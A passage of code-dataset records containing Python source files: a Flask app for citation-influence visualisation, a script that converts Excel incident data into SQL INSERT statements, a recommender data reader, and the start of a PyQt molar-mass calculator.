entities['PaperIds']))\n fos_ids = list(map(int, entities['FieldOfStudyIds']))\n\n flower_name = data.get('flower_name')\n doc_id = url_encode_info(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids, name=flower_name)\n\n if not flower_name:\n first_nonempty_id_list = (author_ids or affiliation_ids\n or conference_ids or journal_ids\n or paper_ids or fos_ids)\n if not first_nonempty_id_list:\n raise ValueError('no entities')\n name_lookup_f = {\n id(author_ids): author_name_query,\n id(affiliation_ids): affiliation_name_query,\n id(conference_ids): conference_name_query,\n id(journal_ids): journal_name_query,\n id(paper_ids): paper_name_query,\n id(fos_ids): fos_name_query}[id(first_nonempty_id_list)]\n flower_name = name_lookup_f([first_nonempty_id_list[0]])[0]\n total_entities = (len(author_ids) + len(affiliation_ids)\n + len(conference_ids) + len(journal_ids)\n + len(paper_ids) + len(fos_ids))\n if total_entities > 1:\n flower_name += f\" +{total_entities - 1} more\"\n\n flower = kb_client.get_flower(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids, pub_years=pub_years,\n cit_years=cit_years, coauthors=coauthors,\n self_citations=self_citations)\n\n stats = kb_client.get_stats(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids)\n\n url_base = f\"http://influencemap.ml/submit/?id={doc_id}\"\n\n session = dict(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_ids=conference_ids, journal_ids=journal_ids,\n fos_ids=fos_ids, paper_ids=paper_ids, flower_name=flower_name,\n url_base=url_base, icoauthor=coauthors, self_cite=self_citations)\n\n rdata = make_response_data(\n flower, stats, is_curated=curated_flag, flower_name=flower_name,\n session=session, selection=dict(\n pub_years=pub_years, cit_years=cit_years, coauthors=coauthors,\n self_citations=self_citations))\n return flask.render_template(\"flower.html\", **rdata)\n\n\n@blueprint.route('/resubmit/', methods=['POST'])\ndef resubmit():\n # option = request.form.get('option')\n # keyword = request.form.get('keyword')\n # flower_config['reference'] = request.form.get('cmp_ref') == 'true'\n # flower_config['num_leaves'] = int(request.form.get('numpetals'))\n # flower_config['order'] = request.form.get('petalorder')\n\n session = json.loads(request.form.get(\"session\"))\n flower_name = session['flower_name']\n author_ids = session['author_ids']\n affiliation_ids = session['affiliation_ids']\n conference_ids = session['conference_ids']\n journal_ids = session['journal_ids']\n fos_ids = session['fos_ids']\n paper_ids = session['paper_ids']\n\n self_citations = request.form.get('selfcite') == 'true'\n coauthors = request.form.get('coauthor') == 'true'\n pub_lower = int(request.form.get('from_pub_year'))\n pub_upper = int(request.form.get('to_pub_year'))\n cit_lower = int(request.form.get('from_cit_year'))\n cit_upper = int(request.form.get('to_cit_year'))\n\n flower = kb_client.get_flower(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids,\n pub_years=(pub_lower, pub_upper), cit_years=(cit_lower, cit_upper),\n coauthors=coauthors, self_citations=self_citations)\n\n rdata = make_response_data(\n flower, flower_name=flower_name, session=session)\n\n return flask.jsonify(rdata)\n\n\ndef conf_journ_to_display_names(papers):\n conf_journ_ids = {\"ConferenceSeriesIds\": [], \"JournalIds\": []}\n for paper in papers.values():\n if \"ConferenceSeriesId\" in paper: conf_journ_ids[\"ConferenceSeriesIds\"].append(paper[\"ConferenceSeriesId\"])\n if \"JournalId\" in paper: conf_journ_ids[\"JournalIds\"].append(paper[\"JournalId\"])\n conf_journ_display_names = get_conf_journ_display_names(conf_journ_ids)\n for paper in papers.values():\n if \"ConferenceSeriesId\" in paper:\n paper[\"ConferenceName\"] = conf_journ_display_names[\"Conference\"][paper[\"ConferenceSeriesId\"]]\n if \"JournalId\" in paper:\n paper[\"JournalName\"] = conf_journ_display_names[\"Journal\"][paper[\"JournalId\"]]\n return papers\n\n\n@blueprint.route('/get_publication_papers')\ndef get_publication_papers():\n request_data = json.loads(request.form.get(\"data_string\"))\n session = request_data.get(\"session\")\n\n pub_year_min = int(request.form.get(\"pub_year_min\"))\n pub_year_max = int(request.form.get(\"pub_year_max\"))\n paper_ids = session['cache']\n papers = paper_info_db_check_multiquery(paper_ids)\n papers = [paper for paper in papers if (paper[\"Year\"] >= pub_year_min and paper[\"Year\"] <= pub_year_max)]\n papers = conf_journ_to_display_names({paper[\"PaperId\"]: paper for paper in papers})\n return flask.jsonify({\"papers\": papers, \"names\": session[\"entity_names\"]+ session[\"node_info\"]})\n\n\n@blueprint.route('/get_citation_papers')\ndef get_citation_papers():\n # request should contain the ego author ids and the node author ids separately\n request_data = json.loads(request.form.get(\"data_string\"))\n session = request_data.get(\"session\")\n\n cite_year_min = int(request.form.get(\"cite_year_min\"))\n cite_year_max = int(request.form.get(\"cite_year_max\"))\n pub_year_min = int(request.form.get(\"pub_year_min\"))\n pub_year_max = int(request.form.get(\"pub_year_max\"))\n paper_ids = session['cache']\n papers = paper_info_db_check_multiquery(paper_ids)\n cite_papers = [[citation for citation in paper[\"Citations\"] if (citation[\"Year\"] >= cite_year_min and citation[\"Year\"] <= cite_year_max)] for paper in papers if (paper[\"Year\"] >= pub_year_min and paper[\"Year\"] <= pub_year_max)]\n citations = sum(cite_papers,[])\n citations = conf_journ_to_display_names({paper[\"PaperId\"]: paper for paper in citations})\n\n return flask.jsonify({\"papers\": citations, \"names\": session[\"entity_names\"] + session[\"node_info\"],\"node_info\": session[\"node_information_store\"]})\n\n\ndef get_entities(paper):\n ''' Gets the entities of a paper\n '''\n authors = [author[\"AuthorName\"] for author in paper[\"Authors\"]]\n affiliations = [author[\"AffiliationName\"] for author in paper[\"Authors\"] if \"AffiliationName\" in author]\n conferences = [paper[\"ConferenceName\"]] if (\"ConferenceName\" in paper) else []\n journals = [paper[\"JournalName\"]] if (\"JournalName\" in paper) else []\n fieldsofstudy = [fos[\"FieldOfStudyName\"] for fos in paper[\"FieldsOfStudy\"] if fos[\"FieldOfStudyLevel\"] == 1] if (\"FieldsOfStudy\" in paper) else []\n\n return authors, affiliations, conferences, journals, fieldsofstudy\n\n\nNODE_INFO_FIELDS = [\"PaperTitle\", \"Authors\", \"PaperId\", \"Year\", \"ConferenceName\",\n \"ConferenceSeriesId\", \"JournalName\", \"JournalId\"]\n\n\ndef get_node_info_single(entity, entity_type, year_ranges):\n # Determine the citation range\n pub_lower = year_ranges[\"pub_lower\"]\n pub_upper = year_ranges[\"pub_upper\"]\n cit_lower = year_ranges[\"cit_lower\"]\n cit_upper = year_ranges[\"cit_upper\"]\n\n # Get paper to get information from\n request_data = json.loads(request.form.get(\"data_string\"))\n session = request_data.get(\"session\")\n papers = paper_info_db_check_multiquery(session[\"cache\"])\n\n # Get coauthors list to filter\n if session['icoauthor'] == 'false':\n coauthors = session['coauthors']\n else:\n coauthors = list()\n\n # Get self_citation list to filter\n if session['self_cite'] == 'false':\n self = session['entity_names']\n else:\n self = list()\n\n # Results\n papers_to_send = dict()\n links = dict()\n\n for paper in papers:\n # Publication range filter\n if paper[\"Year\"] < pub_lower or paper[\"Year\"] > pub_upper:\n continue\n\n for link_type in [\"References\", \"Citations\"]:\n for rel_paper in paper[link_type]:\n # Citation range filter\n if link_type == \"Citations\" and \\\n (rel_paper[\"Year\"] < cit_lower or rel_paper[\"Year\"] > cit_upper):\n continue\n\n # Get fields\n auth, inst, conf, jour, fos = get_entities(rel_paper)\n fields = dict()\n fields['author'] = set(auth)\n fields['inst'] = set(inst)\n fields['conf'] = set(conf + jour)\n fields['fos'] = set(fos)\n\n check = dict()\n check['author'] = coauthors + self\n check['inst'] = coauthors + self\n check['conf'] = coauthors\n check['fos'] = list()\n\n skip = False\n for n_type, check_val in check.items():\n if not set(check_val).isdisjoint(fields[entity_type]):\n skip = True\n break\n if skip:\n continue\n\n if entity not in fields[entity_type]:\n continue\n\n papers_to_send[paper[\"PaperId\"]] = {k:v for k,v in paper.items() if k in NODE_INFO_FIELDS}\n papers_to_send[paper[\"PaperId\"]] = add_author_order(papers_to_send[paper[\"PaperId\"]])\n\n papers_to_send[rel_paper[\"PaperId\"]] = {k:v for k,v in rel_paper.items() if k in NODE_INFO_FIELDS}\n papers_to_send[rel_paper[\"PaperId\"]] = add_author_order(papers_to_send[rel_paper[\"PaperId\"]])\n\n if link_type == \"Citations\":\n if paper[\"PaperId\"] in links:\n links[paper[\"PaperId\"]][\"reference\"].append(rel_paper[\"PaperId\"])\n else:\n links[paper[\"PaperId\"]] = {\"reference\": [rel_paper[\"PaperId\"]], \"citation\": list()}\n else:\n if paper[\"PaperId\"] in links:\n links[paper[\"PaperId\"]][\"citation\"].append(rel_paper[\"PaperId\"])\n else:\n links[paper[\"PaperId\"]] = {\"citation\": [rel_paper[\"PaperId\"]], \"reference\": list()}\n\n paper_sort_func = lambda x: -papers_to_send[x][\"Year\"]\n links = sorted([{\"citation\": sorted(link[\"citation\"],key=paper_sort_func), \"reference\": sorted(link[\"reference\"],key=paper_sort_func), \"ego_paper\": key} for key, link in links.items()], key=lambda x: paper_sort_func(x[\"ego_paper\"]))\n\n return {\"node_name\": entity, \"node_type\": entity_type, \"node_links\": links, \"paper_info\": papers_to_send}\n\n\n\n@blueprint.route('/get_node_info/', methods=['POST'])\ndef get_node_info():\n request_data = json.loads(request.form.get(\"data_string\"))\n node_name = request_data.get(\"name\")\n node_type = request_data.get(\"node_type\")\n session = request_data.get(\"session\")\n year_ranges = session[\"year_ranges\"]\n flower_name = session[\"flower_name\"]\n\n data = get_node_info_single(node_name, node_type, year_ranges)\n data[\"node_name\"] = node_name\n data[\"flower_name\"] = flower_name\n data[\"max_page\"] = math.ceil(len(data[\"node_links\"]) / 5)\n data[\"node_links\"] = data[\"node_links\"][0:min(5, len(data[\"node_links\"]))]\n return flask.jsonify(data)\n\n\n\n@blueprint.route('/get_next_node_info_page/', methods=['POST'])\ndef get_next_node_info_page():\n request_data = json.loads(request.form.get(\"data_string\"))\n node_name = request_data.get(\"name\")\n node_type = request_data.get(\"node_type\")\n session = request_data.get(\"session\")\n year_ranges = session[\"year_ranges\"]\n page = int(request_data.get(\"page\"))\n\n node_info = get_node_info_single(node_name, node_type, year_ranges)\n page_length = 5\n page_info = {\"paper_info\": node_info[\"paper_info\"], \"node_links\": node_info[\"node_links\"][0+page_length*(page-1):min(page_length*page, len(node_info[\"node_links\"]))]}\n return flask.jsonify(page_info)\n","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"601961593","text":"import pandas as pd\nimport pickle\n\n\n\ndef parser_datos(archivo,columna,tabla,atributos):\n\texcel_prueba = pd.read_excel(archivo+\".xlsx\")\n\tdiccionario = {}\n\tlargo_archivo = len(excel_prueba.index)\n\n\tfile_guardar= open(archivo+\".txt\",\"w+\")\n\n\tfor i in range(largo_archivo):\n\t\tprovincia_texto = excel_prueba.loc[[i]][columna][i]\n\t\tdiccionario[provincia_texto] = i\n\n\t\tfile_guardar.write(\"INSERT INTO %s(%s) VALUES(%d,\\\"%s\\\");\\n\" % (tabla,atributos,i,provincia_texto))\n\n\tf = open(archivo+\".pkl\",\"wb\")\n\tpickle.dump(diccionario,f)\n\tf.close()\n\tfile_guardar.close() \n\t#print(diccionario_distritos)\n\ndef abrir_diccionario(archivo):\n\tfile = open(archivo+\".pkl\", 'rb')\n\tdiccionario_distritos = pickle.load(file)\n\t#print(diccionario_distritos)\n\treturn diccionario_distritos\n\ndef parser_datos_totales(archivo):\n\tdiccionario_distrito = abrir_diccionario(\"distritos\")\n\tdiccionario_provincia = abrir_diccionario(\"provincias\")\n\tdiccionario_canton = abrir_diccionario(\"cantones\")\n\tdiccionario_anho = abrir_diccionario(\"anhos\")\n\tdiccionario_mes = abrir_diccionario(\"meses\")\n\tdiccionario_dia = abrir_diccionario(\"dias\")\n\tdiccionario_rol = abrir_diccionario(\"roles\")\n\tdiccionario_sexo = abrir_diccionario(\"sexos\")\n\tdiccionario_lesion = abrir_diccionario(\"lesiones\")\n\n\texcel_leer = pd.read_excel(archivo+\".xlsx\")\n\tlargo_archivo = len(excel_leer.index)\n\n\tfecha_incidente_guardar= open(\"fecha_incidente.txt\",\"w+\")\n\tlocalizacion_guardar= open(\"localizacion.txt\",\"w+\")\n\tincidente_guardar= open(\"incidente.txt\",\"w+\")\n\tafectado_guardar= open(\"afectado.txt\",\"w+\")\n\n\tfor i in range(largo_archivo):\n\t\tdia_excel = excel_leer.loc[[i]][\"Día\"][i]\n\t\tmes_excel = excel_leer.loc[[i]][\"Mes\"][i]\n\t\tanho_excel = excel_leer.loc[[i]][\"Año\"][i]\n\n\t\tdia_numero_tabla = diccionario_dia[dia_excel]\n\t\tmes_numero_tabla = diccionario_mes[mes_excel]\n\t\tanho_numero_tabla = diccionario_anho[anho_excel]\n\n\t\tinsercion_fecha_incidente = \"INSERT INTO FechaIncidente(codigoFechaIncidente,codigoAnho,codigoMes,codigoDia) VALUES(%d,%d,%d,%d);\\n\"%(i,anho_numero_tabla,mes_numero_tabla,dia_numero_tabla)\n\n\t\tfecha_incidente_guardar.write(insercion_fecha_incidente)\n\n\t\tprovincia_excel = excel_leer.loc[[i]][\"Provincia\"][i]\n\t\tcanton_excel = excel_leer.loc[[i]][\"Cantón\"][i]\n\t\tdistrito_excel = excel_leer.loc[[i]][\"Distrito\"][i]\n\n\t\tprovincia_numero_tabla = diccionario_provincia[provincia_excel]\n\t\tcanton_numero_tabla = diccionario_canton[canton_excel]\n\t\tdistrito_numero_tabla = diccionario_distrito[distrito_excel]\n\n\t\tinsercion_localizacion = \"INSERT INTO Localizacion(codigoLocalizacion,codigoProvincia,codigoCanton,codigoDistrito) VALUES(%d,%d,%d,%d);\\n\"%(i,provincia_numero_tabla,canton_numero_tabla,distrito_numero_tabla)\n\n\t\tlocalizacion_guardar.write(insercion_localizacion)\n\n\t\trol_excel = excel_leer.loc[[i]][\"Rol\"][i]\n\t\tsexo_excel = excel_leer.loc[[i]][\"Sexo\"][i]\n\t\tlesion_excel = excel_leer.loc[[i]][\"Tipo de Lesión\"][i]\n\t\tedad_excel = excel_leer.loc[[i]][\"Edad\"][i]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i]][\"Edadquinquenal\"][i]\n\n\t\trol_numero_tabla = diccionario_rol[rol_excel]\n\t\tsexo_numero_tabla = diccionario_sexo[sexo_excel]\n\t\tlesion_numero_tabla = diccionario_lesion[lesion_excel]\n\n\t\tinsercion_afectado = \"INSERT INTO Afectado(codigoAfectado,codigoRol,codigoSexo,codigoLesion,edad,edadQuinquenal) VALUES(%d,%d,%d,%d,\\\"%s\\\",\\\"%s\\\");\\n\"%(i,rol_numero_tabla,sexo_numero_tabla,lesion_numero_tabla,edad_excel,edad_quinquenal_excel)\n\n\t\tafectado_guardar.write(insercion_afectado)\n\n\t\tinsercion_incidente = \"INSERT INTO Incidente(codigoRegistro,codigoLocalizacion,codigoFecha,codigoAfectado) VALUES(%d,%d,%d,%d);\\n\"%((i+1),i,i,i)\n\n\t\tincidente_guardar.write(insercion_incidente)\n\n\tfecha_incidente_guardar.close()\n\tlocalizacion_guardar.close()\n\tincidente_guardar.close()\n\tafectado_guardar.close()\n\ndef parser_datos_totales_forma2(archivo):\n\tdiccionario_distrito = abrir_diccionario(\"distritos\")\n\tdiccionario_provincia = abrir_diccionario(\"provincias\")\n\tdiccionario_canton = abrir_diccionario(\"cantones\")\n\tdiccionario_anho = abrir_diccionario(\"anhos\")\n\tdiccionario_mes = abrir_diccionario(\"meses\")\n\tdiccionario_dia = abrir_diccionario(\"dias\")\n\tdiccionario_rol = abrir_diccionario(\"roles\")\n\tdiccionario_sexo = abrir_diccionario(\"sexos\")\n\tdiccionario_lesion = abrir_diccionario(\"lesiones\")\n\n\texcel_leer = pd.read_excel(archivo+\".xlsx\")\n\tlargo_archivo = len(excel_leer.index)\n\n\tfecha_incidente_guardar= open(\"fecha_incidente.txt\",\"w+\")\n\tlocalizacion_guardar= open(\"localizacion.txt\",\"w+\")\n\tincidente_guardar= open(\"incidente.txt\",\"w+\")\n\tafectado_guardar= open(\"afectado.txt\",\"w+\")\n\n\tprimer_linea_fecha_incidente = \"INSERT INTO FechaIncidente(codigoFechaIncidente,codigoAnho,codigoMes,codigoDia) VALUES\"\n\tfecha_incidente_guardar.write(primer_linea_fecha_incidente)\n\n\tprimer_linea_localizacion = \"INSERT INTO Localizacion(codigoLocalizacion,codigoProvincia,codigoCanton,codigoDistrito) VALUES\"\n\tlocalizacion_guardar.write(primer_linea_localizacion)\n\n\tprimer_linea_afectado = \"INSERT INTO Afectado(codigoAfectado,codigoRol,codigoSexo,codigoLesion,edad,edadQuinquenal) VALUES\"\n\tafectado_guardar.write(primer_linea_afectado)\n\n\tprimer_linea_incidente = \"INSERT INTO Incidente(codigoRegistro,codigoLocalizacion,codigoFechaIncidente,codigoAfectado) VALUES\"\n\tincidente_guardar.write(primer_linea_incidente)\n\tfor i in range(largo_archivo):\n\t\tdia_excel = excel_leer.loc[[i]][\"Día\"][i]\n\t\tmes_excel = excel_leer.loc[[i]][\"Mes\"][i]\n\t\tanho_excel = excel_leer.loc[[i]][\"Año\"][i]\n\n\t\tdia_numero_tabla = diccionario_dia[dia_excel]\n\t\tmes_numero_tabla = diccionario_mes[mes_excel]\n\t\tanho_numero_tabla = diccionario_anho[anho_excel]\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_fecha_incidente = \"(%d,%d,%d,%d);\\n\"%(i,anho_numero_tabla,mes_numero_tabla,dia_numero_tabla)\n\t\telse:\n\t\t\tinsercion_fecha_incidente = \"(%d,%d,%d,%d),\\n\"%(i,anho_numero_tabla,mes_numero_tabla,dia_numero_tabla)\n\n\t\tfecha_incidente_guardar.write(insercion_fecha_incidente)\n\n\t\tprovincia_excel = excel_leer.loc[[i]][\"Provincia\"][i]\n\t\tcanton_excel = excel_leer.loc[[i]][\"Cantón\"][i]\n\t\tdistrito_excel = excel_leer.loc[[i]][\"Distrito\"][i]\n\n\t\tprovincia_numero_tabla = diccionario_provincia[provincia_excel]\n\t\tcanton_numero_tabla = diccionario_canton[canton_excel]\n\t\tdistrito_numero_tabla = diccionario_distrito[distrito_excel]\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_localizacion = \"(%d,%d,%d,%d);\\n\"%(i,provincia_numero_tabla,canton_numero_tabla,distrito_numero_tabla)\n\t\telse:\n\t\t\tinsercion_localizacion = \"(%d,%d,%d,%d),\\n\"%(i,provincia_numero_tabla,canton_numero_tabla,distrito_numero_tabla)\n\n\t\tlocalizacion_guardar.write(insercion_localizacion)\n\n\t\trol_excel = excel_leer.loc[[i]][\"Rol\"][i]\n\t\tsexo_excel = excel_leer.loc[[i]][\"Sexo\"][i]\n\t\tlesion_excel = excel_leer.loc[[i]][\"Tipo de Lesión\"][i]\n\t\tedad_excel = excel_leer.loc[[i]][\"Edad\"][i]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i]][\"Edadquinquenal\"][i]\n\n\t\trol_numero_tabla = diccionario_rol[rol_excel]\n\t\tsexo_numero_tabla = diccionario_sexo[sexo_excel]\n\t\tlesion_numero_tabla = diccionario_lesion[lesion_excel]\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_afectado = \"(%d,%d,%d,%d,\\\"%s\\\",\\\"%s\\\");\\n\"%(i,rol_numero_tabla,sexo_numero_tabla,lesion_numero_tabla,edad_excel,edad_quinquenal_excel)\n\t\telse:\n\t\t\tinsercion_afectado = \"(%d,%d,%d,%d,\\\"%s\\\",\\\"%s\\\"),\\n\"%(i,rol_numero_tabla,sexo_numero_tabla,lesion_numero_tabla,edad_excel,edad_quinquenal_excel)\n\n\t\tafectado_guardar.write(insercion_afectado)\t\n\n\t\tif (i+1 == largo_archivo):\n\t\t\tinsercion_incidente = \"(%d,%d,%d,%d);\\n\"%((i+1),i,i,i)\n\t\telse:\n\t\t\tinsercion_incidente = \"(%d,%d,%d,%d),\\n\"%((i+1),i,i,i)\n\n\t\tincidente_guardar.write(insercion_incidente)\n\n\tfecha_incidente_guardar.close()\n\tlocalizacion_guardar.close()\n\tincidente_guardar.close()\n\tafectado_guardar.close()\n\n\n\ndef parser_datos_tabla_completa(archivo):\n\n\texcel_leer = pd.read_excel(archivo+\".xlsx\")\n\tlargo_archivo = len(excel_leer.index)\n\n\ttabla_total_1_guardar= open(\"tabla_dios1.txt\",\"w+\")\n\ttabla_total_2_guardar= open(\"tabla_dios2.txt\",\"w+\")\n\n\tprimer_linea_tabla_total = \"INSERT INTO IncidenteCompleto(codigoRegistro,nombreProvincia,nombreCanton,nombreDistrito,nombreDia,nombreMes,nombreAnho,nombreRol,nombreSexo,nombreLesion,edad,edadQuinquenal) VALUES\"\n\ttabla_total_1_guardar.write(primer_linea_tabla_total)\n\ttabla_total_2_guardar.write(primer_linea_tabla_total)\n\n\tlargo_1 = largo_archivo//2\n\n\tlargo_2 = (largo_archivo//2)+(largo_archivo%2)\n\n\tcontador = 0\n\n\tfor i in range(largo_1):\n\t\t\n\t\tprovincia_excel = excel_leer.loc[[i]][\"Provincia\"][i]\n\t\tcanton_excel = excel_leer.loc[[i]][\"Cantón\"][i]\n\t\tdistrito_excel = excel_leer.loc[[i]][\"Distrito\"][i]\n\t\tdia_excel = excel_leer.loc[[i]][\"Día\"][i]\n\t\tmes_excel = excel_leer.loc[[i]][\"Mes\"][i]\n\t\tanho_excel = excel_leer.loc[[i]][\"Año\"][i]\n\t\trol_excel = excel_leer.loc[[i]][\"Rol\"][i]\n\t\tsexo_excel = excel_leer.loc[[i]][\"Sexo\"][i]\n\t\tlesion_excel = excel_leer.loc[[i]][\"Tipo de Lesión\"][i]\n\t\tedad_excel = excel_leer.loc[[i]][\"Edad\"][i]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i]][\"Edadquinquenal\"][i]\n\n\t\t\n\t\tinsercion_tabla_zeus = \"(%d,\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\"),\\n\"%((contador+1),provincia_excel,canton_excel,distrito_excel,dia_excel,mes_excel,anho_excel,rol_excel,sexo_excel,lesion_excel,edad_excel,edad_quinquenal_excel)\n\n\t\ttabla_total_1_guardar.write(insercion_tabla_zeus)\n\n\t\tcontador +=1\n\n\tfor i in range(largo_2):\n\t\t\n\t\tprovincia_excel = excel_leer.loc[[i+contador]][\"Provincia\"][i+contador]\n\t\tcanton_excel = excel_leer.loc[[i+contador]][\"Cantón\"][i+contador]\n\t\tdistrito_excel = excel_leer.loc[[i+contador]][\"Distrito\"][i+contador]\n\t\tdia_excel = excel_leer.loc[[i+contador]][\"Día\"][i+contador]\n\t\tmes_excel = excel_leer.loc[[i+contador]][\"Mes\"][i+contador]\n\t\tanho_excel = excel_leer.loc[[i+contador]][\"Año\"][i+contador]\n\t\trol_excel = excel_leer.loc[[i+contador]][\"Rol\"][i+contador]\n\t\tsexo_excel = excel_leer.loc[[i+contador]][\"Sexo\"][i+contador]\n\t\tlesion_excel = excel_leer.loc[[i+contador]][\"Tipo de Lesión\"][i+contador]\n\t\tedad_excel = excel_leer.loc[[i+contador]][\"Edad\"][i+contador]\n\t\tedad_quinquenal_excel = excel_leer.loc[[i+contador]][\"Edadquinquenal\"][i+contador]\n\n\t\t\n\t\tinsercion_tabla_zeus = \"(%d,\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",%s,\\\"%s\\\"),\\n\"%((i+contador+1),provincia_excel,canton_excel,distrito_excel,dia_excel,mes_excel,anho_excel,rol_excel,sexo_excel,lesion_excel,edad_excel,edad_quinquenal_excel)\n\n\t\ttabla_total_2_guardar.write(insercion_tabla_zeus)\n\n\n\n\ttabla_total_1_guardar.close()\n\ttabla_total_2_guardar.close()\n\n\n\ndef divirdirArchivo(archivo):\n\tarchivo_divir = open(archivo, \"r\")\n\t\n\tline = archivo_divir.readline()\n\tcontador_parte = 0\n\n\tparte1 = open(\"parte1_division.txt\",\"w+\")\n\tparte2 = open(\"parte2_division.txt\",\"w+\")\n\tparte3 = open(\"parte3_division.txt\",\"w+\")\n\tparte4 = open(\"parte4_division.txt\",\"w+\")\n\n\tparte1.write(line)\n\tparte2.write(line)\n\tparte3.write(line)\n\tparte4.write(line)\n\n\tline = archivo_divir.readline()\n\n\twhile line:\n\t\tif (contador_parte == 0):\n\t\t\tparte1.write(line)\n\t\t\tcontador_parte+=1\n\t\telif(contador_parte == 1):\n\t\t\tparte2.write(line)\n\t\t\tcontador_parte+=1\n\t\telif(contador_parte == 2):\n\t\t\tparte3.write(line)\n\t\t\tcontador_parte+=1\n\t\telse:\n\t\t\tparte4.write(line)\n\t\t\tcontador_parte = 0\n\t\tline = archivo_divir.readline()\n\n\tparte1.close()\n\tparte2.close()\n\tparte3.close()\n\tparte4.close()\n\tarchivo_divir.close()\n\n \n\n\ndivirdirArchivo(\"tabla_dios2.txt\")\n #array = []\n #for line in ins:\n # array.append(line)'''\n#INSERT INTO Dia(codigoDia,nombreDia) VALUES(3,\"PRUEBA\")\n\n#print(excel_prueba[0])\n#abrir_diccionario(\"diccionario_distritos\")\n\n#parser_datos(\"distritos\",\"Distritos\",\"Distrito\",\"codigoDistrito,nombreDistrito\")\n#parser_datos(\"cantones\",\"Canton\",\"Canton\",\"codigoCanton,nombreCanton\")\n#parser_datos(\"dias\",\"Dia\",\"Dia\",\"codigoDia,nombreDia\")\n#parser_datos(\"meses\",\"Mes\",\"Mes\",\"codigoMes,nombreMes\")\n#parser_datos(\"anhos\",\"Anho\",\"Anho\",\"codigoAnho,nombreAnho\")\n#parser_datos(\"roles\",\"Rol\",\"Rol\",\"codigoRol,nombreRol\")\n#parser_datos(\"lesiones\",\"Lesion\",\"Lesion\",\"codigoLesion,nombreLesion\")\n#parser_datos(\"sexos\",\"Sexo\",\"Sexo\",\"codigoSexo,nombreSexo\")\n#parser_datos(\"provincias\",\"Provincia\",\"Provincia\",\"codigoProvincia,nombreProvincia\")\n\n#parser_datos_totales(\"acc1\")\n#parser_datos_totales_forma2(\"acc1\")\n\n#parser_datos_tabla_completa(\"acc1\")\n#divirdirArchivo(\"tabla_dios1.txt\")\n#print(\"Column headings:\")\n#print(excel_prueba.columns)\n","sub_path":"generacion_inserts_base_datos/prueba_excel.py","file_name":"prueba_excel.py","file_ext":"py","file_size_in_byte":12273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"46966840","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: Quoc-Tuan Truong \n\"\"\"\n\nimport itertools\n\n\ndef read_uir(fpath, u_col=0, i_col=1, r_col=2, sep='\\t', skip_lines=0):\n \"\"\"Read data in the form of triplets (user, item, rating).\n\n Parameters\n ----------\n fpath: str\n Path to the data file\n\n u_col: int, default: 0\n Index of the user column\n\n i_col: int, default: 1\n Index of the item column\n\n r_col: int, default: 2\n Index of the rating column\n\n sep: str, default: \\t\n The delimiter string.\n\n skip_lines: int, default: 0\n Number of first lines to skip\n\n Returns\n -------\n triplets: :obj:`iterable`\n Data in the form of list of tuples of (user, item, rating).\n\n \"\"\"\n triplets = []\n with open(fpath, 'r') as f:\n for line in itertools.islice(f, skip_lines, None):\n tokens = [token.strip() for token in line.split(sep)]\n triplets.append((tokens[u_col], tokens[i_col], float(tokens[r_col])))\n return triplets\n\n\ndef read_ui(fpath, value=1.0, sep='\\t', skip_lines=0):\n \"\"\"Read data in the form of implicit feedback user-items.\n Each line starts with user id followed by multiple of item ids.\n\n Parameters\n ----------\n fpath: str\n Path to the data file\n\n value: float, default: 1.0\n Value for the feedback\n\n sep: str, default: \\t\n The delimiter string.\n\n skip_lines: int, default: 0\n Number of first lines to skip\n\n Returns\n -------\n triplets: :obj:`iterable`\n Data in the form of list of tuples of (user, item, 1).\n\n \"\"\"\n triplets = []\n with open(fpath, 'r') as f:\n for line in itertools.islice(f, skip_lines, None):\n tokens = [token.strip() for token in line.split(sep)]\n triplets.extend([tokens[0], iid, value] for iid in tokens[1:])\n return triplets","sub_path":"cornac/data/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198977640","text":"import sys\r\nimport math\r\n\r\nfrom PyQt5 import QtCore, QtWidgets\r\nfrom PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QLineEdit, QApplication, QWidget\r\nfrom PyQt5.QtWidgets import QPushButton\r\nfrom PyQt5.QtCore import QSize\r\nfrom PyQt5.QtGui import QIcon\r\nimport sqlite3\r\nimport re\r\n\r\n\r\ncon = sqlite3.connect(\"chemi.db\")\r\ncon.row_factory = sqlite3.Row\r\ncur = con.cursor()\r\n\r\n\r\ndef find_atom(simbol):\r\n # функция которая с помощью магии ищет масу атома в БД и возвращает её\r\n cur.execute('SELECT * FROM chemical')\r\n simbol = (simbol,)\r\n sql_find = 'SELECT Weight FROM Chemical WHERE simbol=?'\r\n cur.execute(sql_find, simbol)\r\n simbol_notes = cur.fetchone()\r\n atom = simbol_notes['Weight']\r\n float(atom)\r\n return atom\r\n\r\n\r\ndef moll_mass(k):\r\n formula = k\r\n\r\n 